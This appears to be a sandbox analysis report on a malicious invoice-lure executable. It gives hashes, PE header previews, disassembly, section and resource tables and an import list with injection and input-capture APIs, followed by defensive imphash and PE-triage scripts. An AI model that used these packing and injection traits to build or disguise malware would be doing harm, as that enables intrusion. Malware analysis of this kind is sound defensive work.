                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P........... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):1594368
                                        Entropy (8bit):4.175664576271887
                                        Encrypted:false
                                        SSDEEP:12288:iEP3RF1AV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:hF1sVg9N9JMlDlfjRiVuVsWt5MJMs
                                        MD5:B0C38B43BA0CC2CDF73E2C84A80101CF
                                        SHA1:C3E72FC7A9FA46BFB9AAD09F6D5CA1577665DD9F
                                        SHA-256:26C6A8A5C55F277F1CBAB56E9195B7D76402A2CB2966D0AA8B4CCD0AB9643718
                                        SHA-512:4319403726E700966582510F0903B9593CC18AB371346F8415864E00C3E02351783AC09FA45064DA02EC4D2602EAF6B7A20A7C698154CCB84AD0213894D30204
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\AppVClient.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):12320
                                        Entropy (8bit):7.982693516101535
                                        Encrypted:false
                                        SSDEEP:384:0SCTk5UZuOtPBZvIOexAntEqJ3V7PoPw0:rD5muONBZgOeGnaG1E
                                        MD5:DFBB5131EE48B4475E4105A0E18533B1
                                        SHA1:CEAAA49DDC83A29AA187A23A86C6A35C830B1023
                                        SHA-256:F2EFF4A2536C40A76F7650E15BC37ED8D1EE052B354388A91DB8C2B5D62D0B17
                                        SHA-512:47424C51B9D7E74B097D203E0C230F3C2110BBE175966D99F4063D9E0896F48926588743AC2F242A6560A62D2E773DF5D9D76B6184102242E75D834CECDADD94
                                        Malicious:false
                                        Preview:.8.}...;.f...."........0..$.g.Fe.Q.e.u.$.Q..d..."....9|..?.6.)V.E].fn..}....VS.......xgY.....x...`.2.-6..&..'..u..q....T..f...<..,..C......}...&_...m.S...Y.l.(.......myn8.~"*.....{.3.Mz.J.(.....].~.I3..,+....7.O..~......M_R........Q..S&(........c*..&U....}L....`........!A.=...Y].dB.z..E92.at...c..@..2y....a.}..h..o..z/[...-.0B.#X.......w'm#..H.t.n...e?|...`/.... .-...W.-..&.#n.e...._..=...t...w...a..0D.....y.......?".......d^7..s{.+..T.]....,~+....?)..m^...........ds...5..T8........C....b.D....g....\.?.J..{.P..3.9....jJ.7...Ej.3H.+:..hOMkR......3.......Ip.X.H`..)....q'..3. '.....D.:=.S .B.Fk.b....[...|....A.G\T(...)4&c...;..2Z...J..).%g(KR....9............-}K..._@...ZS.!.q7.?.{e....kJz,E....Hu..n.X@.n.x.+a..l|..W.".~.....OeF...-..i.....{.....DY.../.....Z.y.....J..x......3z.A..].B..s-...j..^.c.p....fY...MX..JvZ.Y.B....."..V.s...|...M...N.$........(..t.w.8m..TH.....d2..|.+'D..:.....T......n..F.y.+..... &.B+Z'.e..,...0.1[.......6bWxB].......a....0
                                        Process:C:\Users\user\Desktop\INV_NE_02_2034388.exe
                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                        Category:modified
                                        Size (bytes):1647104
                                        Entropy (8bit):4.190898007941441
                                        Encrypted:false
                                        SSDEEP:12288:VjkyIAV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:VIyIsVg9N9JMlDlfjRiVuVsWt5MJMs
                                        MD5:9F6FD3589C1C092A0F51D0AE55C2B941
                                        SHA1:26BD7A89B570F41F03DECBEAF4DEFDA040B377DB
                                        SHA-256:F069B2101EFF5493FD98143DB83BB802F8920C82E54DCE8742093EB1362C011A
                                        SHA-512:652F69CCB5844FAAAA317713867E3FA874CF193AA1978270CB280942A4AB92BC2254C0CF436683ABA12984A6C1C57437B3BA0F84EA65A052DBD77926F890C446
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@....................................T..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...............B..............@...................................................................................................................................................................................................................
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.517370504422139
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:INV_NE_02_2034388.exe
                                        File size:1'790'464 bytes
                                        MD5:c5843430a72fa7b29070c33f0f4d83d2
                                        SHA1:a5c6c473fc57e7a8b26bb4acef0be2843aa56653
                                        SHA256:77fff1c59aace50f9bbb9184b1086cccb57df0cb5d3b10589a9b6b91283aa719
                                        SHA512:30c29a3915e07c210af36a50fb97eada75ebc8ffeefe18747fd934ff59f955181762a023c5d69ccdbefdfe67d9a7c2e925160e5b35b2d031cdc818dbac83ce0e
                                        SSDEEP:49152:FG0c++OCvkGs9Fabb7Y+gFIDRRAubt5M:0B3vkJ92GUf
                                        TLSH:6B85E02273DDC360CB669173FF6AB7016EBF7C610630B85B1F980D79A960162162D7A3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                        Icon Hash:aaf3e3e3938382a0
                                        Entrypoint:0x427dcd
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                        Time Stamp:0x675B7F22 [Fri Dec 13 00:26:10 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7
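The Import Hash above is an imphash: the MD5 of the sample's normalized import table (the DLL and function list shown further down this page). The script below recomputes one with the rules pefile applies, so a reviewer can confirm the reported value from a local copy of the file or pivot on it. It is an added editorial example, not code from the report or from pefile. The import list it carries is a constructed excerpt of the first three DLLs from the table below, so it cannot reproduce the report's value (that needs the complete, ordered table), and pefile's ordinal-to-name tables for ws2_32 and oleaut32 are replaced by a generic ord<N> fallback, which is an assumption of this example.

```python
"""Recompute a PE import hash (imphash) from an ordered import table.
Added editorial example, not code from the report or from pefile. Rules
(as implemented by pefile): DLL names lowercased with a .dll/.ocx/.sys
suffix removed, each import rendered as "<dll>.<function>" in lowercase
in import-table order, comma-joined and MD5-hashed. Imports by ordinal
are rendered as ord<N> here; pefile first consults name tables for
ws2_32 and oleaut32 ordinals, which this example omits (assumption)."""
import hashlib

# Constructed excerpt of the first three DLLs from the import table on this
# page; the report's own value needs the complete, ordered table.
SAMPLE_IMPORTS = [
    ("WSOCK32.dll", ["WSACleanup", "socket", "inet_ntoa", "setsockopt"]),
    ("VERSION.dll", ["GetFileVersionInfoW", "GetFileVersionInfoSizeW", "VerQueryValueW"]),
    ("WINMM.dll", ["timeGetTime", "waveOutSetVolume", "mciSendStringW"]),
]
REPORTED_IMPHASH = "afcdf79be1557326c854b6e20cb900a7"  # "Import Hash" above


def normalize_imports(imports):
    """imports: [(dll_name, [function name (str) or ordinal (int), ...]), ...]
    in the order they appear in the import directory. Returns the string
    that gets hashed; order matters, so a reordered table gives a new hash."""
    entries = []
    for dll, functions in imports:
        lib = dll.lower()
        base, dot, ext = lib.rpartition(".")
        if dot and ext in ("dll", "ocx", "sys"):
            lib = base
        for func in functions:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            entries.append(f"{lib}.{name}")
    return ",".join(entries)


def imphash(imports):
    """MD5 hex digest of the normalized import string."""
    return hashlib.md5(normalize_imports(imports).encode("ascii")).hexdigest()


def matches_report(imports, reported=REPORTED_IMPHASH):
    """True when a locally computed imphash equals the report's value."""
    return imphash(imports) == reported.lower()


if __name__ == "__main__":
    print(normalize_imports(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS), "matches report:", matches_report(SAMPLE_IMPORTS))
```

Because the hash covers the order of DLLs and functions as the linker emitted them, two builds of the same AutoIt runtime share an imphash even when the embedded script differs, which is why the value is useful as a pivot across samples and useless for distinguishing payloads.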
                                        Instruction
                                        call 00007FEAE04BA12Ah
                                        jmp 00007FEAE04ACEF4h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007FEAE04AD07Ah
                                        cmp edi, eax
                                        jc 00007FEAE04AD3DEh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007FEAE04AD079h
                                        rep movsb
                                        jmp 00007FEAE04AD38Ch
                                        cmp ecx, 00000080h
                                        jc 00007FEAE04AD244h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007FEAE04AD080h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007FEAE04AD550h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007FEAE04AD21Dh
                                        test edi, 00000003h
                                        jne 00007FEAE04AD22Eh
                                        test esi, 00000003h
                                        jne 00007FEAE04AD20Dh
                                        bt edi, 02h
                                        jnc 00007FEAE04AD07Fh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007FEAE04AD083h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007FEAE04AD0D5h
                                        bt esi, 03h
                                        jnc 00007FEAE04AD128h
                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD4 build 31101
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5ea70 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x8dcc4 | 0x8de00 | 92f37553257a68bb6536aef5e2e09646 | False | 0.5728679102422908 | data | 6.676135952415752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xc7000 | 0x5ea70 | 0x5ec00 | 9bc3f951ef6beca7d3c742c556a151b1 | False | 0.930285290237467 | data | 7.900479406416309 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x126000 | 0x96000 | 0x95000 | 8beb6b09b7e0bc4c658b4b345fa05ff2 | False | 0.975751428796141 | data | 7.938066838476511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333 |
| RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5 |
| RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388 |
| RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524 |
| RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918 |
| RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727 |
| RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496 |
| RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227 |
| RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103 |
| RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0xcf7b8 | 0x55d37 | data | | | 1.0003299738581055 |
| RT_GROUP_ICON | 0x1254f0 | 0x76 | data | English | Great Britain | 0.6610169491525424 |
| RT_GROUP_ICON | 0x125568 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x12557c | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x125590 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x1255a4 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x125680 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823 |
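The data-directory, section and resource tables above contain enough to reproduce several of the report's static observations by hand: a .reloc section that is writable, executable and near-maximum entropy while the BASERELOC directory is empty, an empty SECURITY directory matching "Digitally signed: false", and a single large RT_RCDATA resource that zlib cannot compress. The script below runs those checks. It is an added editorial example, not Joe Sandbox code; the section, directory and resource values are transcribed from the tables above as constructed input (only three of the resource rows are carried), and the entropy, size and compressibility thresholds are the editor's own assumptions rather than anything the report states.

```python
"""Static PE triage over the data-directory, section and resource tables of
this report. Added editorial example, not Joe Sandbox code. The values below
are transcribed from the tables above as constructed input (only three of the
resource rows); the thresholds are the editor's assumptions."""
from collections import namedtuple

IMAGE_BASE = 0x400000   # "Imagebase" above
ENTRYPOINT = 0x427dcd   # "Entrypoint" above (a VA, not an RVA)

# Characteristics are abbreviated: "EXECUTE" stands for IMAGE_SCN_MEM_EXECUTE etc.
Section = namedtuple("Section", "name vaddr vsize rawsize entropy flags")
SECTIONS = [
    Section(".text",  0x1000,   0x8dcc4, 0x8de00, 6.676, {"CODE", "EXECUTE", "READ"}),
    Section(".rdata", 0x8f000,  0x2e10e, 0x2e200, 5.760, {"INITIALIZED_DATA", "READ"}),
    Section(".data",  0xbe000,  0x8f74,  0x5200,  1.199, {"INITIALIZED_DATA", "READ", "WRITE"}),
    Section(".rsrc",  0xc7000,  0x5ea70, 0x5ec00, 7.900, {"INITIALIZED_DATA", "READ"}),
    Section(".reloc", 0x126000, 0x96000, 0x95000, 7.938,
            {"INITIALIZED_DATA", "DISCARDABLE", "EXECUTE", "READ", "WRITE"}),
]
# (RVA, size) per data directory; (0, 0) means the directory is absent.
DATA_DIRS = {
    "IMPORT": (0xba44c, 0x17c), "RESOURCE": (0xc7000, 0x5ea70), "SECURITY": (0, 0),
    "BASERELOC": (0, 0), "DEBUG": (0x92bc0, 0x1c), "TLS": (0, 0),
    "LOAD_CONFIG": (0xa4870, 0x40), "IAT": (0x8f000, 0x884),
}
Resource = namedtuple("Resource", "rtype rva size zlib")
RESOURCES = [
    Resource("RT_ICON",     0xc75a8,  0x128,   0.747),
    Resource("RT_RCDATA",   0xcf7b8,  0x55d37, 1.000),
    Resource("RT_MANIFEST", 0x125680, 0x3ef,   0.507),
]


def section_of(rva, sections=SECTIONS):
    """Name of the section whose range contains rva, or None. Reproduces the
    "Is in Section" column of the data-directory table."""
    for s in sections:
        if s.vaddr <= rva < s.vaddr + max(s.vsize, s.rawsize):
            return s.name
    return None


def triage(sections=SECTIONS, dirs=DATA_DIRS, resources=RESOURCES,
           image_base=IMAGE_BASE, entrypoint=ENTRYPOINT,
           entropy_threshold=7.0, blob_bytes=0x10000, incompressible=0.95):
    """Return (where, finding) pairs for the checks a reviewer applies to a
    static PE summary: W+X sections, executable sections not marked as code,
    high entropy, a .reloc section without a relocation directory, no
    certificate table, a directory RVA or entry point outside any section,
    and large resources that zlib cannot compress."""
    findings = []
    for s in sections:
        if {"EXECUTE", "WRITE"} <= s.flags:
            findings.append((s.name, "writable and executable"))
        if "EXECUTE" in s.flags and "CODE" not in s.flags:
            findings.append((s.name, "executable but not marked as code"))
        if s.entropy >= entropy_threshold:
            findings.append((s.name, f"entropy {s.entropy:.2f}, likely packed or encrypted"))
    if any(s.name == ".reloc" for s in sections) and dirs.get("BASERELOC", (0, 0)) == (0, 0):
        findings.append((".reloc", "section present but BASERELOC directory is empty"))
    if dirs.get("SECURITY", (0, 0)) == (0, 0):
        findings.append(("header", "no certificate table (unsigned)"))
    for name, (rva, _size) in dirs.items():
        if rva and section_of(rva, sections) is None:
            findings.append((name, f"directory RVA {rva:#x} lies outside every section"))
    ep_rva = entrypoint - image_base
    ep_section = section_of(ep_rva, sections)
    ep_flags = next((s.flags for s in sections if s.name == ep_section), set())
    if "EXECUTE" not in ep_flags:
        findings.append(("entrypoint", f"RVA {ep_rva:#x} is not in an executable section"))
    for r in resources:
        if r.size >= blob_bytes and r.zlib >= incompressible:
            findings.append((r.rtype, f"{r.size:#x}-byte resource is incompressible (zlib {r.zlib:.2f})"))
    return findings


if __name__ == "__main__":
    for where, what in triage():
        print(f"{where:<12}{what}")
```

On this sample the checks flag .reloc four times (writable and executable, executable without the code flag, entropy 7.94, and present although the BASERELOC directory is empty), the high-entropy .rsrc section, the missing certificate table and the 0x55d37-byte RT_RCDATA resource; the entry point RVA 0x27dcd resolves to .text and every non-empty directory RVA lands in the section the table names, so those two checks stay quiet. A section that is both writable and executable but carries no base relocations is worth a look in the memory dumps rather than on disk, because whatever it holds is only useful to the sample after it has been transformed at run time.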
| DLL | Import |
|---|---|
| WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect |
| VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create |
| MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W |
| WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho |
| USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA |
| USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, 
